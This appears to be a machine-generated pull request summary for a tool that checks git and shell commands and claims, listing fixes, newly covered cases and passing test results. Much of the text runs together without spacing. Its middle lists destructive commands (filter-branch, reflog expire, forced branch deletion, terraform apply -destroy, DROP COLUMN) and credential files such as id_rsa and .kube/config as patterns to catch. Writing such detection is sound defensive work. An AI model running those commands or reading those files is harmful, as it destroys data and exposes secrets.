f17d1d6.f17d1d6.75e7814.75e7814.e72f142. "instead of" and "rather than" are covered too.e72f142.--stagedwith--worktree: fixed in315d501. Staged-only-Sis no longer a false positive either.315d501.315d501.a5c9ead.-Tuploads: fixed ina5c9ead.--pathspec-from-filerestores and checkouts: fixed ina5c9ead.a5c9ead. The fix is at the root cause: a negation now opposes only the clause it rules out.-uf: fixed inb8e5455.b8e5455. The cap is gone, and cost stays linear because an option argument never starts a nested baregit.b8e5455. "cannot use port 80" used to reinforce "uses port 80".2adee81.2adee81.2adee81.75e7814,315d501,2adee81and769b728also close adjacent gaps of the same kind before another review pass:-Cpathspassed: 0andnone failedas zero countsfilter-branch,filter-repo,reflog expireandupdate-ref -dALTER TABLE … DROP COLUMNid_rsa,.kube/config,.docker/config.json,.npmrc,.pypircgit branch --delete --forceandterraform apply -destroyReview status of the window
claude/pensive-ritchie-i8s7jlis incorporated above.cleanup/engraphis-local-20260925holds the pre-squash history of fix: harden graph and MCP behavior and prepare 1.7.8 #233; main is newer on every file where it differs, so it has nothing unmerged.concurrency.queue: maxinrelease.ymlis valid: GitHub added it in May 2026. The earlier review comment calling it unsupported predates that change.Type
Verification
python -m pytest tests/ -qpasses on1b1a0b3: 7,833 tests collected, with the same 20 environment-dependent skips as the base. Prepare 1.7.9 managed Jev client release #242's head has Preserve graph cache isolation, renderer lifecycle and scoped queries #241's 7,594 passing tests plus one; the 218 new tests here make up the rest.ruff check .passespython -m eval.harness --dataset eval/datasets/sample.jsonl --k 5passes07b3c70.d302365.b179129.c8d2dc2.bb85823.4cb4909.13ac391. Its three guard cases pass on both.86c0fe3.1c473e2. The 14th,--fix-only, guards a regression caught while reviewing the fix, and the three new read-only guard cases pass on both.07b3c70,d302365,b179129,c8d2dc2,bb85823,4cb4909,13ac391and7d1fa9a) passed all GitHub checks.No release, deployment or provider call is included.
🤖 Generated with Claude Code
https://claude.ai/code/session_01RQQDvWHB6hcGwyB8HU3bWy